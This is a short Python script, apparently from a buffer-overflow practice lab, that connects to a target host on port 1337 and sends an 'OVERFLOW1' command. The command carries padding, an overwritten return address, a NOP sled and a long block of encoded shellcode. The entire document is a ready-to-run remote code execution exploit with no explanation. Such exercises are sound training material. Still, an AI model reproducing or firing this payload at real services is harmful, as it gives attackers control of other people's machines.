#!/usr/bin/python
import sys, socket

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

sock.connect((sys.argv[1], 1337))

prefix = "OVERFLOW1 "

#prefix = "OVERFLOW1 "

buffer = prefix

buffer += "A"* 1978

buffer += "\xAF\x11\x50\x62"

buffer += "\x90"* 16

buffer += "\xbd\xad\xfd\x48\x36\xd9\xea\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x52\x31\x6f\x12\x83\xef\xfc\x03\xc2\xf3\xaa\xc3\xe0\xe4\xa9\x2c\x18\xf5\xcd\xa5\xfd\xc4\xcd\xd2\x76\x76\xfe\x91\xda\x7b\x75\xf7\xce\x08\xfb\xd0\xe1\xb9\xb6\x06\xcc\x3a\xea\x7b\x4f\xb9\xf1\xaf\xaf\x80\x39\xa2\xae\xc5\x24\x4f\xe2\x9e\x23\xe2\x12\xaa\x7e\x3f\x99\xe0\x6f\x47\x7e\xb0\x8e\x66\xd1\xca\xc8\xa8\xd0\x1f\x61\xe1\xca\x7c\x4c\xbb\x61\xb6\x3a\x3a\xa3\x86\xc3\x91\x8a\x26\x36\xeb\xcb\x81\xa9\x9e\x25\xf2\x54\x99\xf2\x88\x82\x2c\xe0\x2b\x40\x96\xcc\xca\x85\x41\x87\xc1\x62\x05\xcf\xc5\x75\xca\x64\xf1\xfe\xed\xaa\x73\x44\xca\x6e\xdf\x1e\x73\x37\x85\xf1\x8c\x27\x66\xad\x28\x2c\x8b\xba\x40\x6f\xc4\x0f\x69\x8f\x14\x18\xfa\xfc\x26\x87\x50\x6a\x0b\x40\x7f\x6d\x6c\x7b\xc7\xe1\x93\x84\x38\x28\x50\xd0\x68\x42\x71\x59\xe3\x92\x7e\x8c\xa4\xc2\xd0\x7f\x05\xb2\x90\x2f\xed\xd8\x1e\x0f\x0d\xe3\xf4\x38\xa4\x1e\x9f\x4c\x30\x22\x6a\x39\x40\x22\x85\xe5\xcd\xc4\xcf\x05\x98\x5f\x78\xbf\x81\x2b\x19\x40\x1c\x56\x19\xca\x93\xa7\xd4\x3b\xd9\xbb\x81\xcb\x94\xe1\x04\xd3\x02\x8d\xcb\x46\xc9\x4d\x85\x7a\x46\x1a\xc2\x4d\x9f\xce\xfe\xf4\x09\xec\x02\x60\x71\xb4\xd8\x51\x7c\x35\xac\xee\x5a\x25\x68\xee\xe6\x11\x24\xb9\xb0\xcf\x82\x13\x73\xb9\x5c\xcf\xdd\x2d\x18\x23\xde\x2b\x25\x6e\xa8\xd3\x94\xc7\xed\xec\x19\x80\xf9\x95\x47\x30\x05\x4c\xcc\x50\xe4\x44\x39\xf9\xb1\x0d\x80\x64\x42\xf8\xc7\x90\xc1\x08\xb8\x66\xd9\x79\xbd\x23\x5d\x92\xcf\x3c\x08\x94\x7c\x3c\x19"

buffer += "C"* 50

sock.send(buffer)

sock.close()
